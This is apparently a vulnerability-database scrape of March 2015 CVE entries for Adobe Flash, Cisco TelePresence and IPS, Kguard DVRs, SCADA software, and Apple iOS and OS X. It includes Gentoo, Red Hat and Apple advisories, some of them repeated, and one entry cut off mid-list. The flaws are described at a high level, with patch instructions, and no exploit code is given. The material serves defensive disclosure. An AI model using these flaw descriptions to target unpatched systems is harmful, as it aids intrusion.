http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0337
[ 7 ] CVE-2015-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0338
[ 8 ] CVE-2015-0339
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0339
[ 9 ] CVE-2015-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0340
[ 10 ] CVE-2015-0341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0341
[ 11 ] CVE-2015-0342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0342
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:0697-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0697.html
Issue date: 2015-03-17
CVE Names: CVE-2015-0332 CVE-2015-0333 CVE-2015-0334
CVE-2015-0335 CVE-2015-0336 CVE-2015-0337
CVE-2015-0338 CVE-2015-0339 CVE-2015-0340
CVE-2015-0341 CVE-2015-0342
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB15-05
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2015-0332, CVE-2015-0333, CVE-2015-0335, CVE-2015-0339,
CVE-2015-0334, CVE-2015-0336, CVE-2015-0338, CVE-2015-0341, CVE-2015-0342)
This update also fixes a cross-domain policy bypass flaw and a file upload
restriction bypass flaw.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1201636 - flash-plugin: multiple code execution issues fixed in APSB15-05
1201649 - CVE-2015-0337 flash-plugin: cross-domain policy bypass (APSB15-05)
1201651 - CVE-2015-0340 flash-plugin: file upload restriction bypass (APSB15-05)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-0332
https://access.redhat.com/security/cve/CVE-2015-0333
https://access.redhat.com/security/cve/CVE-2015-0334
https://access.redhat.com/security/cve/CVE-2015-0335
https://access.redhat.com/security/cve/CVE-2015-0336
https://access.redhat.com/security/cve/CVE-2015-0337
https://access.redhat.com/security/cve/CVE-2015-0338
https://access.redhat.com/security/cve/CVE-2015-0339
https://access.redhat.com/security/cve/CVE-2015-0340
https://access.redhat.com/security/cve/CVE-2015-0341
https://access.redhat.com/security/cve/CVE-2015-0342
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVCFmyXlSAg2UNWIIRArVvAKCjJLAKXJvnMOZ5a5IBxmKVEPZu6QCfemGc
9kdM+Q/ZOQRcHTfQ3iZRj3s=
=8M6g
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0377 | CVE-2015-0332 | Adobe Flash Player Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 13.0.0.277 and 14.x through 17.x before 17.0.0.134 on Windows and OS X and before 11.2.202.451 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0333, CVE-2015-0335, and CVE-2015-0339. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All adobe-flash users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.451"
References
==========
[ 1 ] CVE-2015-0332
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0332
[ 2 ] CVE-2015-0333
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0333
[ 3 ] CVE-2015-0334
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0334
[ 4 ] CVE-2015-0335
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0335
[ 5 ] CVE-2015-0336
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0336
[ 6 ] CVE-2015-0337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0337
[ 7 ] CVE-2015-0338
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0338
[ 8 ] CVE-2015-0339
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0339
[ 9 ] CVE-2015-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0340
[ 10 ] CVE-2015-0341
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0341
[ 11 ] CVE-2015-0342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0342
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201503-09
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2015 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2015:0697-01
Product: Red Hat Enterprise Linux Supplementary
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0697.html
Issue date: 2015-03-17
CVE Names: CVE-2015-0332 CVE-2015-0333 CVE-2015-0334
CVE-2015-0335 CVE-2015-0336 CVE-2015-0337
CVE-2015-0338 CVE-2015-0339 CVE-2015-0340
CVE-2015-0341 CVE-2015-0342
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
Red Hat Product Security has rated this update as having Critical security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed in the Adobe Security Bulletin APSB15-05
listed in the References section.
Multiple flaws were found in the way flash-plugin displayed certain SWF
content. An attacker could use these flaws to create a specially crafted
SWF file that would cause flash-plugin to crash or, potentially, execute
arbitrary code when the victim loaded a page containing the malicious SWF
content. (CVE-2015-0332, CVE-2015-0333, CVE-2015-0335, CVE-2015-0339,
CVE-2015-0334, CVE-2015-0336, CVE-2015-0338, CVE-2015-0341, CVE-2015-0342)
This update also fixes a cross-domain policy bypass flaw and a file upload
restriction bypass flaw.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1201636 - flash-plugin: multiple code execution issues fixed in APSB15-05
1201649 - CVE-2015-0337 flash-plugin: cross-domain policy bypass (APSB15-05)
1201651 - CVE-2015-0340 flash-plugin: file upload restriction bypass (APSB15-05)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-11.2.202.451-1.el5.i386.rpm
x86_64:
flash-plugin-11.2.202.451-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-11.2.202.451-1.el6.i686.rpm
x86_64:
flash-plugin-11.2.202.451-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2015-0332
https://access.redhat.com/security/cve/CVE-2015-0333
https://access.redhat.com/security/cve/CVE-2015-0334
https://access.redhat.com/security/cve/CVE-2015-0335
https://access.redhat.com/security/cve/CVE-2015-0336
https://access.redhat.com/security/cve/CVE-2015-0337
https://access.redhat.com/security/cve/CVE-2015-0338
https://access.redhat.com/security/cve/CVE-2015-0339
https://access.redhat.com/security/cve/CVE-2015-0340
https://access.redhat.com/security/cve/CVE-2015-0341
https://access.redhat.com/security/cve/CVE-2015-0342
https://access.redhat.com/security/updates/classification/#critical
https://helpx.adobe.com/security/products/flash-player/apsb15-05.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFVCFmyXlSAg2UNWIIRArVvAKCjJLAKXJvnMOZ5a5IBxmKVEPZu6QCfemGc
9kdM+Q/ZOQRcHTfQ3iZRj3s=
=8M6g
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201503-0157 | CVE-2015-0652 | plural Cisco Product Session Description Protocol Denial of service in implementation (DoS) Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Session Description Protocol (SDP) implementation in Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway before X8.2 and Cisco TelePresence Conductor before XC2.4 allows remote attackers to cause a denial of service (mishandled exception and device reload) via a crafted media description, aka Bug IDs CSCus96593 and CSCun73192. Multiple Cisco products are prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to reload an affected device, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCus96593 and CSCun73192
| VAR-201503-0158 | CVE-2015-0653 | plural Cisco Vulnerabilities that bypass authentication in the product management interface |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The management interface in Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway before X7.2.4, X8 before X8.1.2, and X8.2 before X8.2.2 and Cisco TelePresence Conductor before X2.3.1 and XC2.4 before XC2.4.1 allows remote attackers to bypass authentication via crafted login parameters, aka Bug IDs CSCur02680 and CSCur05556. Vendors have confirmed this vulnerability Bug IDs CSCur02680 and CSCur05556 It is released as.Skillfully crafted by a third party login Authentication may be bypassed via parameters. Multiple Cisco Products are prone to multiple authentication-bypass vulnerabilities.
An attacker can exploit these issues to bypass the authentication mechanism and gain unauthorized administrative access. This may aid in further attacks.
These issues are being tracked by Cisco Bug ID's CSCur02680 and CSCur05556
| VAR-201503-0159 | CVE-2015-0654 | Cisco Intrusion Prevention System Software management interface MainApp of TLS Service disruption in implementations (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
Race condition in the TLS implementation in MainApp in the management interface in Cisco Intrusion Prevention System (IPS) Software before 7.3(3)E4 allows remote attackers to cause a denial of service (process hang) by establishing many HTTPS sessions, aka Bug ID CSCuq40652. Cisco Intrusion Prevention System is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the MainApp process to become unresponsive, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuq40652. The system can immediately interrupt, adjust or isolate some abnormal or harmful network data transmission behaviors
| VAR-201708-0323 | CVE-2015-4464 | Kguard Digital Video Recorder 104 and 108 Authentication vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Kguard Digital Video Recorder 104, 108, v2 does not have any authorization or authentication between an ActiveX client and the application server. Kguard Digital Video Recorder 104 and 108 Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Kguard Digital Video Recorder (DVR) is a digital hard disk recorder from Kguard. There is a command injection vulnerability in Kguard Digital Video Recorder. An attacker could exploit this vulnerability to execute arbitrary commands in the context of an affected application. KguardDVR has security bypass, information disclosure, denial of service, and command injection vulnerabilities. An information-disclosure vulnerability
3. Multiple denial-of-service vulnerability
4
| VAR-201503-0334 | CVE-2014-9207 |
Cimon CmnView DLL Hijacking vulnerability
Related entries in the VARIoT exploits database: VAR-E-201503-0456 |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Untrusted search path vulnerability in CmnView.exe in CIMON CmnView 2.14.0.1 and 3.x before UltimateAccess 3.02 allows local users to gain privileges via a Trojan horse DLL in the current working directory. CIMON CmnView and UltimateAccess of CmnView.exe Contains a vulnerability that allows it to get permission due to a flaw in search path processing. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. CmnView is a WEB-based SCADA application. The CmnView application contains a DLL that fails to specify an absolute path, allowing an attacker to exploit a vulnerability to build a malicious application, placed in a specific path, allowing the application to maliciously load the DLL and execute it. Cimon CmnView is prone to a vulnerability that lets attackers execute arbitrary code.
Successful exploits will allow the attackers to execute arbitrary code in the context of the user running the affected application
| VAR-201503-0371 | CVE-2014-5409 | GE Digital Energy Hydran M2 for 17046 Ethernet Vulnerability in a packet being spoofed |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The 17046 Ethernet card before 94450214LFMT100SEM-L.R3-CL for the GE Digital Energy Hydran M2 does not properly generate random values for TCP Initial Sequence Numbers (ISNs), which makes it easier for remote attackers to spoof packets by predicting these values. Supplementary information : CWE Vulnerability type by CWE-330: Use of Insufficiently Random Values ( Insufficient random value used ) Has been identified. The GE Hydran M2 is a fault gas and moisture detection solution. General Electric (GE) Hydran M2 is prone to a predictable random number generator weakness
| VAR-201503-0067 | CVE-2015-0978 | Telerik Analytics Monitor Library allows DLL hijacking |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Multiple untrusted search path vulnerabilities in (1) EQATEC.Analytics.Monitor.Win32_vc100.dll and (2) EQATEC.Analytics.Monitor.Win32_vc100-x64.dll in Elipse E3 4.5.232 through 4.6.161 allow local users to gain privileges via a Trojan horse DLL in an unspecified directory. NOTE: this may overlap CVE-2015-2264. Telerik Analytics Monitor Library is a third-party application analytics service that collects detailed application metrics for vendors. Some versions of the Telerik library allow DLL hijacking, allowing an attacker to load malicious code in the context of the Telerik-based application. Elipse E3 of (1) EQATEC.Analytics.Monitor.Win32_vc100.dll and (2) EQATEC.Analytics.Monitor.Win32_vc100-x64.dll Contains a vulnerability that allows it to get permission due to a flaw in search path processing. This vulnerability CVE-2015-2264 And may be duplicated. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. http://cwe.mitre.org/data/definitions/426.htmlLocal users can detect Trojans in unspecified directories DLL You may get permission through. Telerik Analytics Monitor Library is prone to multiple local arbitrary code-execution vulnerabilities.
A local attacker can leverage these issues to execute arbitrary code with SYSTEM privileges. Failed attempts may lead to denial-of-service condition. Elipse Software E3 is a set of HMI/SCADA platform that provides support for distributed applications, mission-critical applications and control centers from Elipse Software in Brazil
| VAR-201503-0075 | CVE-2015-1062 | Apple iOS and Apple TV of MobileStorageMounter Vulnerable to creating folders in arbitrary file system locations |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
MobileStorageMounter in Apple iOS before 8.2 and Apple TV before 7.1 does not delete invalid disk-image folders, which allows attackers to create folders in arbitrary filesystem locations via a crafted app. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. Apple TV and iOS are prone to a local security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2015-03-09-1 iOS 8.2
iOS 8.2 is now available and addresses the following:
CoreTelephony
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker can cause a device to unexpectedly restart
Description: A null pointer dereference issue existed in
CoreTelephony's handling of Class 0 SMS messages. This issue was
addressed through improved message validation.
CVE-ID
CVE-2015-1063 : Roman Digerberg, Sweden
iCloud Keychain
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able
to execute arbitrary code
Description: Multiple buffer overflows existed in the handling of
data during iCloud Keychain recovery. These issues were addressed
through improved bounds checking.
CVE-ID
CVE-2015-1065 : Andrey Belenko of NowSecure
IOSurface
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A type confusion issue existed in IOSurface's handling
of serialized objects. The issue was addressed through additional
type checking.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
MobileStorageMounter
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to create folders in
trusted locations in the file system
Description: An issue existed in the developer disk mounting logic
which resulted in invalid disk image folders not being deleted. This
was addressed through improved error handling.
CVE-ID
CVE-2015-1062 : TaiG Jailbreak Team
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: Secure Transport accepted short ephemeral RSA keys,
usually used only in export-strength RSA cipher suites, on
connections using full-strength RSA cipher suites. This issue, also
known as FREAK, only affected connections to servers which support
export-strength RSA cipher suites, and was addressed by removing
support for ephemeral RSA keys.
CVE-ID
CVE-2015-1067 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
Prosecco at Inria Paris
Springboard
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device is not activated
Description: An unexpected application termination during activation
could have caused the device to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2015-1064
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.2".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJU/fWsAAoJEBcWfLTuOo7t7VUQAIsLCBlvhkiqbJ4xdanG1RZI
Ld7787ljx6ksnLMiFJNCECOIm3fk7TKMUfFn7HXYR/hg/w0GPb7dXUNkNh9IhdjF
H8dur2Eb3iR3EPDhnGvPcgic059SKKgVUgyzMfr8td3onswWq90aG+8eAgq3ri9B
qAL8wUSoXDz0VPUJ2H7VcktfcdXqFmS5lPGa8PpEAzNAhN+utsw61yoJgILHh9g6
5axRobZFpd7CKy+ADPUtlMUYQQliRX+BNX+ZZgh1bsEmXJMmeHxKjEN6Iq18ObD7
ucFihWs6WFroDHuHMvuR/yJARqInChMzd/EMkjSfHH2ldSbTyGmsTp/4D1aofQMp
V6D8JjsHvdb/jWq5qCmFEBXf1VpXXqvNI1rq3D7qHOIJJPQH5afzI9ujymOrsspH
Li0lD2TrwnLJznoRgAGVYSo0dhouUmhRYkd4zJkQMoR/Rn/aL3xWGT5XhFEkfdFD
rvFv0LgaiC/5jbLZczUVk1yYQTkJ4mM8h02GnHd1CLvSdf1naEvTw3goBJguI233
5R89HVZA0Z2P6Vyk1bn5V0SWYasVATmjfr89lkhESVVfszakEvxTxmg4fZ65Gwtq
MWSMUBzFZT09abSUEH27BYVGYoe1HCk8sAKlOhMvd1s2O54kZbHeuIMvfrYT5C0d
3T50q8/I5HSn+5c9eHvz
=l+X4
-----END PGP SIGNATURE-----
| VAR-201503-0090 | CVE-2015-1066 | Apple OS X of IOAcceleratorFamily Vulnerable to arbitrary code execution |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Off-by-one error in IOAcceleratorFamily in Apple OS X through 10.10.2 allows attackers to execute arbitrary code in a privileged context via a crafted app. Failed exploit attempts may result in a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2015-03-09-3 Security Update 2015-002
Security Update 2015-002 is now available and addresses the
following:
iCloud Keychain
Available for: OS X Yosemite v10.10.2
Impact: An attacker with a privileged network position may be able
to execute arbitrary code
Description: Multiple buffer overflows existed in the handling of
data during iCloud Keychain recovery. These issues were addressed
through improved bounds checking.
CVE-ID
CVE-2015-1065 : Andrey Belenko of NowSecure
IOAcceleratorFamily
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
and OS X Yosemite v10.10.2
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An off by one issue existed in IOAcceleratorFamily.
This issue was addressed through improved bounds checking.
CVE-ID
CVE-2015-1066 : Ian Beer of Google Project Zero
IOSurface
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
and OS X Yosemite v10.10.2
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A type confusion issue existed in IOSurface's handling
of serialized objects. The issue was addressed through additional
type checking.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Yosemite v10.10.2
Impact: Maliciously crafted or compromised applications may be able
to determine addresses in the kernel
Description: The mach_port_kobject kernel interface leaked kernel
addresses and heap permutation value, which may aid in bypassing
address space layout randomization protection. This was addressed by
disabling the mach_port_kobject interface in production
configurations.
CVE-ID
CVE-2014-4496 : TaiG Jailbreak Team
Secure Transport
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
and OS X Yosemite v10.10.2
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: Secure Transport accepted short ephemeral RSA keys,
usually used only in export-strength RSA cipher suites, on
connections using full-strength RSA cipher suites. This issue, also
known as FREAK, only affected connections to servers which support
export-strength RSA cipher suites, and was addressed by removing
support for ephemeral RSA keys.
CVE-ID
CVE-2015-1067 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
Prosecco at Inria Paris
Security Update 2015-002 may be obtained from the Mac App Store
or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJU/fmlAAoJEBcWfLTuOo7tiDQP/2pmrat21oSpVVCytKMELXhx
QJ3IERRNcNOI/toYqEei7WH8XeiIBo2Eq2IRrxuNPqILEDJDzv47UfmyN9jwfgoo
R73nGHR1NwbhlvB6ckfSRqb0uLGmT3Gs+fSQSEVzlWJfrUjqwWEQwZIZubEKW4DK
F9PoKormSyciv+g0Aw0A4WvFTfAeM3qUcq3I6bIqSM76tUhzuq63TOz5e6KGoAvp
VHm34OvVU/vt0YLvi3kw5mbxisYfJPyrfTzSRdD7ATvsPc8LGWP4tG46cKy6lBVe
7T7T5lb0ApRl7JEvy37KZCMvvd+OQr2YZA8HE06FrfGw8QvoQSKaHVMxib7shq1i
but+lmTi7SUO3OY/5CqpJlSYUdaS3wTTEF6VuI3tsdHsGNNH1zync2+UmSKpIzyR
TxbGyyozbdZ+R83ULE0jar9BsDFQR9VSNiNqDB89Y3Rx6rcePFXlQ1W2J7/yhS+N
kYrlbNLeZdPFHfVKS+rl/spbEkOi+jp/W2NoBTRGwOU6eED5/YE6WN6podZZKW9b
I3NWRzFnxtpk9Y/UldV1iPlZJQzTf8smP7dUZcweCDrFQg8QLhETENG0f4r2/30u
i6DSLoFrdFE1Z1+mF3SG9++9f+PSvOXqt7iRrYJMyoPWbKtb9gxIOs8mK5T/D+vu
TJDXCjMND7F2ZJFRim/F
=7PU8
-----END PGP SIGNATURE-----
| VAR-201503-0077 | CVE-2015-1064 | Apple iOS of Springboard Vulnerabilities that prevent activation requests |
CVSS V2: 1.9 CVSS V3: - Severity: LOW |
Springboard in Apple iOS before 8.2 allows physically proximate attackers to bypass an intended activation requirement and read the home screen by leveraging an application crash during the activation process. Apple iOS is prone to a local security-bypass vulnerability.
Attackers with physical access to the device can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. Springboard is a desktop for Apple iDevice. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2015-03-09-1 iOS 8.2
iOS 8.2 is now available and addresses the following:
CoreTelephony
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker can cause a device to unexpectedly restart
Description: A null pointer dereference issue existed in
CoreTelephony's handling of Class 0 SMS messages. This issue was
addressed through improved message validation.
CVE-ID
CVE-2015-1063 : Roman Digerberg, Sweden
iCloud Keychain
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able
to execute arbitrary code
Description: Multiple buffer overflows existed in the handling of
data during iCloud Keychain recovery. These issues were addressed
through improved bounds checking.
CVE-ID
CVE-2015-1065 : Andrey Belenko of NowSecure
IOSurface
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A type confusion issue existed in IOSurface's handling
of serialized objects. The issue was addressed through additional
type checking.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
MobileStorageMounter
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to create folders in
trusted locations in the file system
Description: An issue existed in the developer disk mounting logic
which resulted in invalid disk image folders not being deleted. This
was addressed through improved error handling.
CVE-ID
